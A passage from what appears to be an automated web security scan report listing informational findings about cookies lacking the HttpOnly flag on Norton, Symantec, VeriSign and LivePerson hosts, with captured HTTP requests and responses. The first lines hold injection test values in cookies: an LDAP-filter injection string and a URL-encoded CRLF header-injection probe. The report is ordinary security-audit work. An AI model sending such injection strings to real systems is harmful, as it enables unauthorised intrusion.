LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.47. http://buy.symanteccloud.com/freetrial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.symanteccloud.com
Path:	/freetrial

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /freetrial HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.48. http://buy.symanteccloud.com/smbstore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.symanteccloud.com
Path:	/smbstore

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smbstore HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.49. http://com-verisign.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://com-verisign.netmng.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?async=1&ref= HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7CzPCBedpYRoO6OzhXoTF9q%2FaQjQpstH0WqFCxsh5%2B48J3547ECvJaebMq81oWRc3MP36Ne8FDKqi2tKvM0qAtvn5eUZVLjXQuMBCzsj9xlU6q8vkojmNUdsxdhJSq0RYJ%2FgEF5%2FA69puw0HLQJ9EPXM6sL1Ue6IGucoZYZgTJQnZo9CTdABHM4ueiLU%2FDJA8GIJKj5bIIOmyH%2FBCLQ0VIEg%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:39 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:24:39 GMT
Last-Modified: Wed, 07 Sep 2011 21:24:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/
Content-Length: 3418
Connection: close
Content-Type: text/html; charset=UTF-8

function json_encode(expr){var str='';switch(typeof(expr)){case"object":if(expr==null){str="null"}else if(expr.constructor==Date){str="\""+expr.getFullYear()+"-"+String(exp.getMonth()+100).substr(1)+"
...[SNIP]...

10.50. http://com-verisign.netmng.com// previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://com-verisign.netmng.com
Path:	//

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T; expires=Sat, 10-Mar-2012 21:28:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET //?function=nmHandshake&rand=0.2648393476847559&nm_input_data= HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:22 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:22 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T; expires=Sat, 10-Mar-2012 21:28:22 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

10.51. http://free.pctools.com/res/js/utils.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://free.pctools.com
Path:	/res/js/utils.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinefamily.norton.com
Path:	/familysafety/basicpremium.fs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

formVersion=1315604730862; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /familysafety/basicpremium.fs HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.54. http://renewals.symantec.com/renewals/application previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://renewals.symantec.com
Path:	/renewals/application

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

entryURL=/renewals/application

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /renewals/application HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:21 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application
Connection: close
Content-Length: 21430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<!-- BEGIN
...[SNIP]...

10.55. https://renewals.symantec.com/renewals/application previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/application

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.56. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
HumanClickKEY=3716944001314187740; path=/hc/2735064
HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.57. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1315603889280; expires=Sat, 10-Sep-2011 21:31:29 GMT; path=/
HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:29 GMT; path=/hc/2735064; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=570873120101-204310992732&protV=20&lpjson=1&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=-5110247826455-1315603884:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603889280; expires=Sat, 10-Sep-2011 21:31:29 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:29 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:29 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29679

lpConnLib.Process({"ResultSet": {"lpCallId":"570873120101-204310992732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.58. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=3716944001314187740; path=/hc/2735064
HumanClickACTIVE=1315603882871; expires=Sat, 10-Sep-2011 21:31:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/2735064/?&site=2735064&cmd=mTagKnockPage&lpCallId=65178923542-457588254008&protV=20&lpjson=1&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-norton-estore-us-english%7ClpMTagConfig.db1%7ClpButton%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickACTIVE=1315603882871; expires=Sat, 10-Sep-2011 21:31:22 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:22 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29678

lpConnLib.Process({"ResultSet": {"lpCallId":"65178923542-457588254008","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.ne
...[SNIP]...

10.59. http://sales.liveperson.net/hc/71097838/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
HumanClickKEY=298575764909514573; path=/hc/71097838
HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=942795420530-312355306232&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/resources/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=7891132346&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&PV%21unit=store-business&PV%21Section=Shopping%20Resources&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&SV%21ActivityCode=87117&SV%21store-business_ActivityCode=87117&SV%21RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&SV%21store-business_RequestACallURL=http%3A//www4.symantec.com/Vrt/wl%3Ftu_id%3DeeiX12537391&title=Store%20Shopping%20Resources%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20s_pers%3D%2520s_nr%253D1315621903651-New%257C1336357903651%253B%2520event69%253Devent69%257C1336357903652%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/8 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; HumanClickKEY=298575764909514573; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603875047

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
Set-Cookie: HumanClickKEY=298575764909514573; path=/hc/71097838
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:16 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"942795420530-312355306232","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.60. http://sales.liveperson.net/hc/71097838/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=7999207371985552108; path=/hc/71097838
HumanClickACTIVE=1315603614239; expires=Sat, 10-Sep-2011 21:26:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=170505760237-674877319251&protV=20&lpjson=1&id=7041138736&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7999207371985552108; path=/hc/71097838
Set-Cookie: HumanClickACTIVE=1315603614239; expires=Sat, 10-Sep-2011 21:26:54 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"170505760237-674877319251","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.61. http://sales.liveperson.net/hc/71097838/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

